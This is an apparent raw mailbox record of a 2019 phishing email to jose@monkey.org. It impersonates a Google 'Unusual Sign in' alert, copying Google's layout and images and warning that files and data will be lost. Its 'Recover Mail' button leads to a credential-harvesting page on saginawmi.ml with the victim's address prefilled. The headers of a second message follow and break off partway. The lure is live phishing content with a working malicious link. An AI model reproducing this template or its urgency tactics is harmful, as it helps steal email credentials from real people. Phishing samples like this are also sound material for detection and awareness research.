From: monkey.org <kh@qandil.se>
To: <jose@monkey.org>
Subject: jose@monkey.org Unusual Sign in.
Date: Tue, 5 Feb 2019 00:56:44 -0800
Message-ID: <20190205005644.A158CB1D7E357B73@qandil.se>
MIME-Version: 1.0
Return-Path: kh@qandil.se
Received-SPF: None (QDEX.qandil.se: kh@qandil.se does not designate permitted
 sender hosts)
Status: O
X-Status: 
X-Keywords:                  
X-UID: 26

------=_NextPart_000_0012_83EFCA2B.1C672629
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD>
<META name=3DGENERATOR content=3D"MSHTML 11.00.9600.18921"></HEAD>
<body>
<table style=3D"MAX-WIDTH: 600px; MIN-WIDTH: 220px; PADDING-BOTTOM: 20px" c=
ellspacing=3D"0" cellpadding=3D"0" border=3D"0">
<TBODY>
<TR>
<td>
<table cellspacing=3D"0" cellpadding=3D"0">
<TBODY>
<TR>
<td></TD>
<td>
<table style=3D"PADDING-BOTTOM: 7px; DIRECTION: ltr" cellspacing=3D"0" cell=
padding=3D"0" width=3D"100%" border=3D"0">
<TBODY>
<TR>
<td align=3D"left"></TD>
<td style=3D"FONT-FAMILY: Roboto-Light,Helvetica,Arial,sans-serif" align=3D=
"right">jose</TD>
<td width=3D"35" align=3D"right"><img style=3D"WIDTH: 28px; MIN-HEIGHT: 28p=
x; border-radius: 50%" src=3D"cid:anonymousprofilephoto.png" width=3D"28" h=
eight=3D"28"></TD></TR></TBODY></TABLE></TD>
<td></TD></TR>
<TR>
<td style=3D"BACKGROUND: url(https://ci5.googleusercontent.com/proxy/Ky9uO0=
L4rCGl_EWbkifDjpWLd1NFKfi-7b0JFxdVNqqFxNiBhPWyAqs1qKnPjpW5SaR1r77z_cI3vg96-=
jP6lpbwEfA67jtQsf_zpAF_QNGPg11GKPcs=3Ds0-d-e1-ft#https://www.gstatic.com/ac=
countalerts/email/hodor/4-corner-nw.png) no-repeat left top" height=3D"5" w=
idth=3D"6">
<DIV></DIV></TD>
<td style=3D"BACKGROUND: url(https://ci4.googleusercontent.com/proxy/gXzgRO=
1K9pWfZAogBcrVQnvwQSkX2I8jcnx4g-SvUNfv82pak_4MS_c1aUDeM40soy4koxNBI_ked6U7z=
rdBUTjETr518K7PLsfDQqhgTKSF2StiCg=3Ds0-d-e1-ft#https://www.gstatic.com/acco=
untalerts/email/hodor/4-pixel-n.png) repeat-x center top" height=3D"5">
<DIV></DIV></TD>
<td style=3D"BACKGROUND: url(https://ci5.googleusercontent.com/proxy/FCthMI=
cyUgO8YTLL_W5YLLOf8y-W7iePJhbY6RQcus60exGI_nmzO0_hpSJ3NY-IfXIgy7OGWAcb9gi34=
GE4UjaXoVwU99DLo_R6kdVlVf90Yw0S5N6J=3Ds0-d-e1-ft#https://www.gstatic.com/ac=
countalerts/email/hodor/4-corner-ne.png) no-repeat right top" height=3D"5" =
width=3D"6">
<DIV></DIV></TD></TR>
<TR>
<td style=3D"BACKGROUND: url(https://ci4.googleusercontent.com/proxy/nt_AIB=
8tvZvtjQ12K1IxqaM2XPLvZjk-KfB0zxDCUh74WW4hggtOwVMhqJjCPlfdv-7695plB1wt2DOjd=
6bfj9g6YSYsIWkLks-Sp2OOLZrCHVSNqA=3Ds0-d-e1-ft#https://www.gstatic.com/acco=
untalerts/email/hodor/4-pixel-w.png) repeat-y left center" width=3D"6">
<DIV></DIV></TD>
<td>
<DIV style=3D"FONT-SIZE: 24px; FONT-FAMILY: Roboto-Regular,Helvetica,Arial,=
sans-serif; BORDER-BOTTOM: #f0f0f0 thin solid; COLOR: ; PADDING-BOTTOM: 38p=
x; TEXT-ALIGN: center; PADDING-TOP: 40px; PADDING-LEFT: 20px; PADDING-RIGHT=
: 20px">
<DIV>Unusual Sign in<BR><A style=3D"FONT-SIZE: 16px; FONT-FAMILY: Roboto-Re=
gular,Helvetica,Arial,sans-serif; COLOR: ; LINE-HEIGHT: 1.8" rel=3Dnoreferr=
er>jose@monkey.org</A></DIV></DIV>
<DIV style=3D"FONT-SIZE: 13px; FONT-FAMILY: Roboto-Regular,Helvetica,Arial,=
sans-serif; COLOR: ; PADDING-BOTTOM: 32px; PADDING-TOP: 24px; PADDING-LEFT:=
 20px; LINE-HEIGHT: 1.6; PADDING-RIGHT: 20px">
<DIV>We received some notification regarding Unusual Signing into your acco=
unt and recent changes. <BR>You will be restricted to your account and migh=
t lead to loss of files, data, contacts, documents and transactions if we d=
o not hear from you <BR>Please kindly click below to Confirm your Email and=
 reclaim your account.=20
<DIV style=3D"TEXT-ALIGN: center; PADDING-TOP: 24px">
<A style=3D"TEXT-DECORATION: none; DISPLAY: inline-block" href=3D"https://s=
aginawmi.ml/update/late-code/index.php?email=3Djose@monkey.org" rel=3Dnoref=
errer target=3D_blank=20
data-saferedirecturl=3D"https://www.google.com/url?hl=3Den&amp;q=3Dhttps://=
accounts.google.com/AccountChooser?Email%3Dsales.departmental01@gmail.com%2=
6continue%3Dhttps://myaccount.google.com/alert/nt/1534495922000?rfn%253D31%=
2526rfnc%253D1%2526eid%253D4303316623928776213%2526et%253D0%2526asae%253D2%=
2526anexp%253Dhsc-control_b&amp;source=3Dgmail&amp;ust=3D1535116302380000&a=
mp;usg=3DAFQjCNEOaDQ29t26hkfrMyxwRWRBYvEXnA">
<table style=3D"MIN-WIDTH: 90px; BACKGROUND-COLOR: #4184f3; border-radius: =
2px" cellspacing=3D"0" cellpadding=3D"0" border=3D"0">
<TBODY>
<TR style=3D"HEIGHT: 6px"></TR>
<TR>
<td style=3D"TEXT-ALIGN: center; PADDING-RIGHT: 8px; PADDING-LEFaT: 8px">
<A style=3D"FONT-SIZE: 13px; TEXT-DECORATION: none; FONT-FAMILY: Roboto-Reg=
ular,Helvetica,Arial,sans-serif; TEXT-TRANSFORM: uppercase; FONT-WEIGHT: 40=
0; COLOR: #ffffff; LINE-HEIGHT: 20px" href=3D"https://saginawmi.ml/update/l=
ate-code/index.php?email=3Djose@monkey.org">Recover Mail</A></TD></TR>
<TR style=3D"HEIGHT: 6px"></TR></TBODY></TABLE></A></DIV></DIV></DIV></TD>
<td style=3D"BACKGROUND: url(https://ci6.googleusercontent.com/proxy/nl-bhi=
VKfxoOB7l8fKJYsYxLGDXboVNAkOuVf2Uvp0gH24jKX-8iA4BRlejLgTxLKrMUJ_-Bl4tXJPbWh=
4qe7du3j2u-XwOc4vXL4K7JsVPWNAup3A=3Ds0-d-e1-ft#https://www.gstatic.com/acco=
untalerts/email/hodor/4-pixel-e.png) repeat-y left center" width=3D"6">
<DIV></DIV></TD></TR>
<TR>
<td style=3D"BACKGROUND: url(https://ci3.googleusercontent.com/proxy/jfAHFN=
bb5XE9oYVyuunjwVJtgqc_knoooAotgLuxEgfAyq_Wjxon4zP-UeAI9LypsjsmD4LIbAkRu_ypi=
36lEngdVUx92ToChAkh_jvPYFWG0yrUFZu5=3Ds0-d-e1-ft#https://www.gstatic.com/ac=
countalerts/email/hodor/4-corner-sw.png) no-repeat left top" height=3D"5" w=
idth=3D"6">
<DIV></DIV></TD>
<td style=3D"BACKGROUND: url(https://ci5.googleusercontent.com/proxy/RniWkH=
AniZgi6tGOh-m_jRAhJfDZPUcI07_qMnA2H3lz_OgKL92-fTeRX-hGfY0Xe7vmSdFV8JegmJHRX=
noFCJ8AHeqnb0WRxPQLPmjroNPBoVQoHg=3Ds0-d-e1-ft#https://www.gstatic.com/acco=
untalerts/email/hodor/4-pixel-s.png) repeat-x center top" height=3D"5">
<DIV></DIV></TD>
<td style=3D"BACKGROUND: url(https://ci6.googleusercontent.com/proxy/4eP0Q0=
IrdbbpIB09xEGV4oCRL6wZSSIR3WUel-pqjhdIMo4ehQk3f-p8izrdtEcVBkwKnVQYEh39DC6hM=
ooGoc7H-q6EL3UH39aLF_9OSzX48i-BopOl=3Ds0-d-e1-ft#https://www.gstatic.com/ac=
countalerts/email/hodor/4-corner-se.png) no-repeat left top" height=3D"5" w=
idth=3D"6">
<DIV></DIV></TD></TR>
<TR>
<td></TD>
<td>
<DIV style=3D"TEXT-ALIGN: left">
<DIV style=3D"FONT-SIZE: 12px; FONT-FAMILY: Roboto-Regular,Helvetica,Arial,=
sans-serif; COLOR: ; PADDING-TOP: 10px; LINE-HEIGHT: 20px">
<DIV>
<DIV style=3D"DIRECTION: ltr">&copy; 2019 monkey.org</DIV></DIV></DIV></DIV=
></TD>
<td></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR><TR heigh=
t=3D"32px"></TR></TBODY></BODY></HTML>
------=_NextPart_000_0012_83EFCA2B.1C672629
Content-Type: image/png; name="anonymousprofilephoto.png"
Content-Transfer-Encoding: base64
Content-ID: <anonymousprofilephoto.png>

iVBORw0KGgoAAAANSUhEUgAAAGAAAABgCAMAAADVRocKAAAAA3NCSVQICAjb4U/gAAAAFVBM
VEWlxP9KfOecw/9Ccd45cN5lkeyIrPiHXw4ZAAAEH0lEQVRoge1YCXLDIAwEI/z/JxfQCQaj
xOlkOtPgOLWbCK1Wp0M4/vgKX9fgwWpHoM+/u/45+P765+D765+D76/XOKDXL2EOR845xnJy
6nW8wkGRnqCs8qof+eP65yI76gFQYbhwu751VtWjWRXIGVzYPSujfDBH2QPyRrvDy0GRXyRC
tEaqt7Y7+PVnvatlIr7rhWeH/TfI/k1ipHPDU3c6P4BA7JP0lBgF3FnXxUHIqVkcESAAiPKZ
cnjoSQeg9uI6BCARJ/CUg+ahbHkFALhJg8DmeGsFSKJ4dSQ0FKKhW884OEnV7i1WqukDA/pN
+xeKgVyIiCAO2K8c0bb5bxZKSWH2KfaiCPl9BGVFyW4dhGgNtdTRwUGoElsJuEIATq3PEBAH
FwggENYIPBywHdiBQJxJWHjGQTYG1zeGATrXjRd5OMicGtDnOSOBwnrmRS3QJBuh8rQls1AC
7QkHAVRno7dmo5oqniDASLOWR7WF4juOHRy0etZpL8ZhQ20stNGfk0WU/BOlILRt9lV5u38r
mZA0IEyqw3pza4H9CtjTieuLbAJwbwFPX0RGGkloKSp/pNOWaIs2BREB+187raSCBQA87ijU
jq30awbC1zZHODloGM5sOSjbQD4/NaGSHmULoEwEJN71e78WdY9ctc8k/XfmtGCUcmJ3R6L+
wRfeX74kfXp5i/ndXT6m+yPUL8zJ6DhnXXL5IS2qgxYPrcMx1Hf9SGXeP12T8r5eFNlNZPeq
JaLc5E3e1/3MCaSD75sjLDgQ108u9hzkqBM+78I7pch3W954Q39u3XWq7MRrWav/W08hq71L
OwGJ+h+BgIBwrqWDt8hiVqf1pRIn00WYeib2wq/EWYd3x4ERAV2hTFr8eW+qQfDKvMnzqjyh
0LYOLALsjRjDtEeaciDsWSa1mklvygiaLjqu7fRvNR6i6GxaCjAUMErC1wD10lccnEMvSgqy
WB2qkoQJ42Aj3XpQ9f/YNXICIXUQZGoQj8Kxf8dB6BtRsU9PAs/h0ibhM7BTFV3oXxY5PEQD
RIxjvUieAKhXnTb3rTiYILDZyDJv+/oWdedx3GDA06GDMFh7qGEgmUuFACaclxzUA6BzIlW1
8yJDjo48FsGaBzC4hQgYJF/iukdgnHLGwcyNesEyZMqCK4IVE2Jx+1sDpRsyezUGBPM4aBww
l/xoyALQIZMSCqcVwOeoQ1hNEAj47lHLEMfpCmA+9k/jYHCiIRNpLjLJFc8XDlYI1BIRumAa
IAyazBFcONDQmQKACQQe25wIIC5sMeg73JgW5nkcOBjgihA78zkR9OVgwcAAAYPEx8EtgA5E
X+D8HAzVbM7AwMINggsHXRhMGeh3V/O9EAcmdGcMTCDEWTZdcGD7wzUD0LOACC4GWSDYxsAF
AnFwEfcDfj447EC+jSUAAAAASUVORK5CYII=

------=_NextPart_000_0012_83EFCA2B.1C672629--

From jose@monkey.org Wed Feb  6 00:42:30 2019 +0000
Return-Path: jseard@okdrs.gov
Delivered-To: jose@monkey.org
X-FDA: 75133339260.32.twig33_6d20e35b2581e
X-Spam-Summary: 50,0,0,b4e83d65a5284b72,d41d8cd98f00b204,jseard@okdrs.gov,:info@it-mail.org,RULES_HIT:10:41:72:355:379:474:582:960:962:967:973:978:983:988:989:1152:1158:1189:1208:1221:1260:1263:1313:1314:1345:1381:1431:1436:1437:1516:1517:1518:1535:1541:1560:1575:1588:1589:1592:1594:1691:1711:1714:1730:1749:1777:1792:2525:2527:2528:2561:2564:2682:2685:2693:2859:2892:2894:2895:2902:2917:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3865:3867:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4048:4321:4362:4379:4552:5007:6261:6658:6678:6688:7078:7688:8603:8885:8957:9025:9059:9111:9388:9411:9868:9873:9874:9908:10004:10026:10049:10197:10346:10400:10919:11257:11656:11658:11914:12043:12050:12051:12438:12519:12855:12895:13019:13139:13163:13219:13229:13237:14093:14181:14659:14721:14885:21080:21326:21433:21451:21499:21627:21740:21795:21819:30021:30022:30026:30051:30054:30070:30075,0,RBL:70.183.40.169:@okdrs.gov:.lbl8.mailshell.net-62.2.0.100 64
X-HE-Tag: twig33_6d20e35b2581e
X-Filterd-Recvd-Size: 5230
Received: from maildrs1.okdrs.gov (COX-70-183-40-169-static.coxinet.net [70.183.40.169])
	by imf04.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed,  6 Feb 2019 00:42:29 +0000 (UTC)
X-AuditID: ac11019a-103ff70000000e61-f6-5c5a2d38c100
Received: from exchangecas0.okdrs.gov (Unknown_Domain [172.17.1.58])
	(using TLS with cipher ECDHE-RSA-AES256-SHA (256/256 bits))
	(Client did not present a certificate)
	by maildrs1.okdrs.gov (Symantec Messaging Gateway) with SMTP id E9.30.03681.83D2A5C5; Tue,  5 Feb 2019 18:41:28 -0600 (CST)
Received: from EML-EXA01-805.okdrs.gov ([169.254.1.169]) by
 ExchangeCAS0.okdrs.gov ([::1]) with mapi id 14.03.0415.000; Tue, 5 Feb 2019
 18:41:27 -0600
